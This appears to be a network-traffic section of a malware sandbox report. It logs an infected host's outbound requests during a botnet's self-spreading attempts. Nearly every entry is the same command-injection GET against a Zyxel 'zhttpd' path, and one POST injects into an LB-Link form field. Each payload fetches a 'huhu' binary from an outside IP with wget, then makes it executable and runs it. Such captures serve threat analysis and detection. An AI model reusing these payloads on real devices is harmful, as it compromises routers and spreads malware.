                                                      Feb 2, 2024 06:35:47.517116070 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      3091192.168.2.1435888155.100.49.222443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:47.517172098 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      3092192.168.2.1445258125.223.24.160443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:47.517215014 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      3093192.168.2.1446722151.134.255.139443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:47.517251968 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      3094192.168.2.145288281.113.252.180443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:47.517292023 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      3095192.168.2.1457396187.172.111.116443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:47.517338991 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      3096192.168.2.14607569.16.22.28443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:47.517364979 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      3097192.168.2.1440454135.124.148.140443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:47.517409086 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      3098192.168.2.144289481.131.216.215443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:47.517448902 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      3099192.168.2.145830013.114.186.197443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:47.517481089 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      3100192.168.2.1436152186.229.243.191443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:47.517540932 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      3101192.168.2.1445178176.194.98.212443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:47.517575979 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      3102192.168.2.1434796169.79.29.193443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:47.517627954 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      3103192.168.2.1445296161.71.219.193443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:47.517668009 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      3104192.168.2.1433064213.207.185.219443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:47.517713070 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      3105192.168.2.144508044.91.169.170443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:47.517740011 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      3106192.168.2.143992282.105.42.42443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:47.517765999 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      3107192.168.2.144222437.107.173.90443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:47.517811060 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      3108192.168.2.143626819.246.216.172443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:47.517842054 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      3109192.168.2.1436562220.104.50.235443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:47.517896891 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      3110192.168.2.1436478143.134.206.141443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:47.517925024 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      3111192.168.2.144242068.7.190.108443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:47.517976046 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      3112192.168.2.1440656201.22.176.248443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:47.518004894 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      3113192.168.2.145848473.87.127.16443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:47.518064976 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      3114192.168.2.1450140154.18.85.231443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:47.518090963 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      3115192.168.2.1457086170.155.58.16443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:47.518121958 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      3116192.168.2.145426252.141.39.123443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:47.518146038 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      3117192.168.2.14590388.56.65.234443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:47.518212080 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      3118192.168.2.1459246163.21.0.112443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:47.518251896 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      3119192.168.2.1449134104.4.247.124443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:47.518306971 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      3120192.168.2.1457168200.108.160.192443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:47.518347025 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      3121192.168.2.1454244222.99.1.94443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:47.518367052 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      3122192.168.2.1448906160.203.154.140443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:47.518413067 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      3123192.168.2.143705827.164.196.90443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:47.518455029 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      3124192.168.2.144729639.222.77.97443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:47.518495083 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      3125192.168.2.144350018.11.189.96443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:47.518515110 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      3126192.168.2.145986086.31.169.194443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:47.518567085 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      3127192.168.2.1445726124.78.222.112443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:47.518601894 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      3128192.168.2.1451790130.66.97.6443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:47.518626928 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      3129192.168.2.1440234216.39.53.181443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:47.518695116 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      3130192.168.2.144987418.247.197.245443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:47.518727064 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      3131192.168.2.1445476103.135.242.48443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:47.518758059 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      3132192.168.2.1445612154.135.153.8443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:47.518799067 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      3133192.168.2.143636874.173.115.213443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:47.518857002 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      3134192.168.2.1434434108.198.158.244443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:47.518907070 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      3135192.168.2.1434368145.133.82.248443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:47.518942118 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      3136192.168.2.143411844.159.55.55443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:47.518986940 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      3137192.168.2.1440896128.221.166.169443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:47.519046068 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      3138192.168.2.144465447.163.191.45443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:47.519082069 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      3139192.168.2.1438430124.163.159.87443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:47.519112110 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      3140192.168.2.1455454173.220.79.86443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:47.519149065 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      3141192.168.2.1434776102.189.68.92443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:47.519193888 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      3142192.168.2.14392369.98.59.1443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:47.519222975 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      3143192.168.2.143866296.123.154.164443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:47.522584915 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      3144192.168.2.1460212192.148.218.43443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:47.522608995 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      3145192.168.2.1460554162.159.62.538080
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:48.390166044 CET237OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                                      Cookie: user=admin
                                                      Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 31 38 30 2e 31 34 39 2e 31 35 36 2f 68 75 68 75 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 68 75 68 75 2e 6d 70 73 6c 3b 20 2e 2f 68 75 68 75 2e 6d 70 73 6c 20 6c 62 6c 69 6e 6b 2e 73 65 6c 66 72 65 70 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                                      Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://103.180.149.156/huhu.mpsl; chmod 777 huhu.mpsl; ./huhu.mpsl lblink.selfrep;rm -rf *mpsl*;
                                                      Feb 2, 2024 06:35:48.510406971 CET328INHTTP/1.1 400 Bad Request
                                                      Server: cloudflare
                                                      Date: Fri, 02 Feb 2024 05:35:48 GMT
                                                      Content-Type: text/html
                                                      Content-Length: 155
                                                      Connection: close
                                                      CF-RAY: -
                                                      Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                      Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      3146192.168.2.143737023.94.33.97443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:48.531891108 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      3147192.168.2.1448084145.165.50.201443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:48.531927109 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      3148192.168.2.145339477.32.157.19443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:48.531970024 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
